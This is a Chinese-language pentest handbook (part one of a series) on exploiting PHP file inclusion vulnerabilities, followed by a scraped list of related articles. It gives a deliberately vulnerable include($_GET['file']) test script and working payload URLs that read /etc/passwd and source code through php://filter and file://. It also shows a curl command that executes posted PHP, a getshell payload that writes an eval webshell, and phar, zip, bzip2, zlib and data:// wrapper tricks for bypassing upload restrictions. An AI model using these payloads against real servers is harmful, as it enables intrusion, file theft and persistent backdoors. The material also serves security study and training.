本文作者:Qftm

目录

前言

相关函数

四个函数

函数功能

函数差异

漏洞原因

漏洞分类

包含姿势

php伪协议

php://filter

file://

php://input

file_get_contents()的利用

phar://

phar

zip://

bzip2://

zlib://

data://

前言

这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结。

相关函数

四个函数

php中引发文件包含漏洞的通常主要是以下四个函数:

1、include()

http://www.php.net/manual/en/function.include.php

2、include_once()

http://php.net/manual/en/function.include-once.php

3、require()

http://php.net/manual/en/function.require.php

4、require_once()

http://php.net/manual/en/function.require-once.php

函数功能

当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。

函数差异

include()

include() 函数包含出错的话,只会提出警告,不会影响后续语句的执行

require()

require() 函数包含出错的话,则会直接退出,后续语句不在执行

include_once() 和 require_once()

require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。

二次包含

一次包含

漏洞原因

文件包含函数所加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致执行了非预期的代码。

漏洞分类

LFI

LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看服务器上的一些重要文件。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。

例如本地读取/etc/passwd系统重要文件

RFI

RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。但RFI的利用条件较为苛刻,需要php.ini中进行配置

allow_url_fopen = On
allow_url_include = On

allow_url_fopen = On

该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。

allow_url_include:On

该选项为on便是允许 包含URL 对象文件等。

两个配置选项均需要为On,才能远程包含文件成功

修改php.ini

在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。

php5.5.9 -> php.ini

包含姿势

php伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

可以在phpinfo中的Registered PHP Streams中找到可使用的协议。

下面测试代码均为:

<?php$file  = $_GET['file'];include($file);
?>

若有特殊案例,会声明。

php.ini

allow_url_fopen 默认为 On
allow_url_include 默认为 Off

若有特殊要求,会在利用条件里指出。

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

参数

过滤器列表

  • 字符串过滤器
  • string.strip_tags
  • 转换过滤器
  • 压缩过滤器
  • 加密过滤器
可用过滤器列表:https://www.php.net/manual/zh/filters.php

利用条件:无

利用姿势1

index.php?file=php://filter/read=convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。

利用姿势2

index.php?file=php://filter/convert.base64-encode/resource=index.php

效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。

file://

专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取

用法

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext?file=file://[文件的绝对路径+文件名]

利用条件:无

利用姿势

index.php?file=file:///etc/passwd

php://input

php://input是个可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。

利用条件

allow_url_include = On
allow_url_fopen = On/Off

利用姿势

index.php?file=php://inputPOST:
<?php phpinfo();?>/<? phpinfo();?>

也可以使用burpsuitecurl进行利用

curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d "<?php phpinfo();?>"

Getshell

POST:
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[Qftm])?>');?>

file_get_contents()的利用

file_get_contents()函数将整个文件读入一个字符串中

测试代码

<?php
$file  = $_GET['file'];
if(file_get_contents($file,'r') == "Qftm"){echo "you are Admin!!!";
}
?>

利用条件:无

利用姿势:

file_get.php?file=php://inputPOST:
Qftm

php://input可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。enctype=”multipart/form-data” 的时候 php://input 是无效的。

phar://

phar:// 支持zipphar格式的文件包含。

zip

用法

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]
?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

利用条件:php >= 5.3.0

利用姿势1

配合文件上传漏洞,当仅可以上传zip格式时

index.php?file=phar://index.zip/index.txt
index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt

新建index.txt,使用zip格式压缩 -> index.zip

利用姿势2

配合文件上传漏洞,当仅可以上传图片格式时

针对phar://不管后缀是什么,都会当做压缩包来解压。

index.php?file=phar://head.png/head.txt
index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt

将做好的zip后缀改为png格式

phar

phar文件本质上是也一种压缩文件。

用法


?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]
?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

制作phar文件

制作包含恶意代码文件的phar文件

(1)确保本地php.iniphar.readonly=Off

(2)编写恶意phar文件的php脚本

phar.php


<?php@unlink("phar.phar");$phar = new Phar("phar.phar");$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>");  //设置stub$phar->addFromString("head.txt", "<?php phpinfo();?>");  //添加要压缩的文件及内容//签名自动计算 $phar->stopBuffering();
?>

(3)生成phar文件

<?php
$p = new PharData(dirname(__FILE__).'/phartest.aaa', 0,'phartest',Phar::ZIP) ;
$p->addFromString('testfile.txt', '<?php phpinfo();?>');
?>

利用条件:php >= 5.3.0

利用姿势1


index.php?file=phar://phar.phar/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt

利用姿势2


index.php?file=phar://phar.png/head.txtindex.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt

利用协议特性,更改后缀文件可适当绕过一些限制

zip://

zip协议phar协议类似,都支持相对路径绝对路径(几乎网上所有人都说zip协议不支持相对路径,事实上是可以!!!)

php version 5.2.9时已经修复zip://相对路径问题

使用zip协议,需将#编码为%23(浏览器时)

用法

?file=zip://[压缩包文件相对路径]#[压缩文件内的子文件名]
?file=zip://[压缩包文件绝对路径]#[压缩文件内的子文件名]

利用条件:php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径)

利用姿势1

index.php?file=zip://head.zip%23head.txt
index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt

利用姿势2

针对zip://不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。

index.php?file=zip://head.png%23head.txt
index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt

相对路径

php5.3.29 windows

php5.5.9 windows

5.4.16 Linux Centos7

绝对路径

windwos

Linux Centos7

bzip2://

用法


?file=compress.bzip2://[压缩包文件相对路径]
?file=compress.bzip2://[压缩包文件绝对路径]

利用条件:php >= 5.2

利用姿势1


index.php?file=compress.bzip2://head.bz2index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2

相对路径

绝对路径

利用姿势2

利用协议特性,更改后缀文件可适当绕过一些限制


index.php?file=compress.bzip2://head.jpgindex.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

zlib://

用法


?file=compress.zlib://[压缩包文件相对路径]
?file=compress.zlib://[压缩包文件绝对路径]

利用条件:php >= 5.2

利用姿势1


index.php?file=compress.zlib://head.gzindex.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz

相对路径

绝对路径

利用姿势2

利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.zlib://head.jpg
index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

data://

数据流封装器,和php://相似都是利用了流的概念

用法

data:,<文本数据>
data:text/plain,<文本数据>
data:text/html,<HTML代码>
data:text/html;base64,<base64编码的HTML代码>
data:text/css,<CSS代码>
data:text/css;base64,<base64编码的CSS代码>
data:text/javascript,<Javascript代码>
data:text/javascript;base64,<base64编码的Javascript代码>
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的png图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据

利用条件

php >= 5.2
allow_url_fopen = On
allow_url_include = On

利用姿势1

index.php?file=data:text/plain,<?php phpinfo();?>index.php?file=data://text/plain,<?php phpinfo();

......未完待续

实操练习--文件包含漏洞-中级篇 (介绍文件包含时绕过限制的原理,以及介绍利用文件包含漏洞读取源码的原理。)

http://hetianlab.com/expc.do?ec=ECID21bb-8308-4117-ab95-a4602fa6c377

PHP文件包含漏洞利用思路与Bypass总结手册(一)相关推荐

  1. fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结手册(一)

    作者:Qftm 合天智汇 前言 这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结. 相关函数 四个函数 php中引发文件包含漏洞的通常主要是以下四个函数: 1.include ...

  2. centos 阿帕奇无法解析php_PHP文件包含漏洞利用思路与Bypass总结手册(二)

    作者:Qftm 合天智汇 接上一篇:https://www.toutiao.com/i6819918030252802571/ 包含Session 在了解session包含文件漏洞及绕过姿势的时候,我 ...

  3. php本地文件包含漏洞,php文件包含漏洞利用小结

    漏洞概述: 文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息的泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式. 产生原因: ...

  4. php文件包含漏洞利用

    上周我们部门弄了一个web安全的兴趣小组.说实话实在惭愧我虽然在安全公司每天都面对着各种漏洞,但是对渗透技术知之又少.于是加入兴趣小组后痛下决心好好学习渗透知识. 现在记录一下上周兴趣小组出的一个测试 ...

  5. php filter 文件包含,php://filter(文件包含漏洞利用)及php://input

    1. php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1. 字符串过滤 ...

  6. PHP文件包含漏洞(利用phpinfo)复现

    漏洞简介: PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来拿到权限.因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名 ...

  7. 【代码审计】PHP文件包含漏洞利用总结

    0x01 概述 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而导致意外的文件泄露甚至恶意的代码注入.涉及文件包含漏洞的四个函数如下: includ ...

  8. 攻防世界CTF —— PHP本地文件包含漏洞解题思路

    原题目如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page ...

  9. 文件包含漏洞 文件伪协议利用

    目录 0x0 文件包含漏洞原理 0x1 检测文件包含漏洞 0x2 文件包含漏洞类型 0x3 文件协议流 0x4 实战 简介 #文件包含漏洞 原理,检测,类型,利用,修复等 #文件包含各个脚本代码 AS ...

最新文章

  1. 优秀案例:12个精美的设计工作室 设计公司网站
  2. ajax webmethod,JQuery直接调用asp.net后台WebMethod方法
  3. 1 物料xxxxxx在仓库101里不存在
  4. 大数据---数据分析师的完整流程与知识结构体系
  5. Spring学习总结(12)——Druid连接池及监控在spring配置
  6. SDUT_2012省赛选拔赛2 部分题目
  7. QT编程入门系列文章之六——API 文档的使用
  8. 流畅的Python笔记
  9. C语言自学——lesson4
  10. IDEA Tomcat 无法加载mysql驱动
  11. OracleRAC基本概念及入门
  12. 2013年全球重要黑客大会时间及网址一览
  13. Android Jetpack架构组件之Room
  14. html——form表单提交方法submit和button
  15. 机器学习之路一:线性模型、非线性模型、神经网络
  16. Vue - 网站首屏加载等待动画(极简解决方案)
  17. 【数据结构与算法】之深入解析“情侣牵手”的求解思路与算法示例
  18. python csv转tsv
  19. css3如何实现字体放大缩小动画
  20. 托福高频真词List16 // 附托福TPO阅读真题

热门文章

  1. SAP SAP 交货单批导三部走(带批次)
  2. docker容器使用docker-squash压缩体积
  3. Android基础之intent-filter、action、category标签使用
  4. 【论文阅读】A detailed analysis of CICIDS2017 dataset for designing Intrusion Detection Systems
  5. linux puppy 安装软件,puppy linux(linux操作系统)V5.7.2 官方版
  6. 半年招聘筛选了400+份简历,告诉你怎么写容易被撩!
  7. 《吻别》英文版《Take me to your heart》
  8. 使用百度地图实现车辆轨迹回放
  9. 《装甲战》的主要原则
  10. vue3+ts+ant-table横向表格数据实现对单元格过滤之后的数据进行标红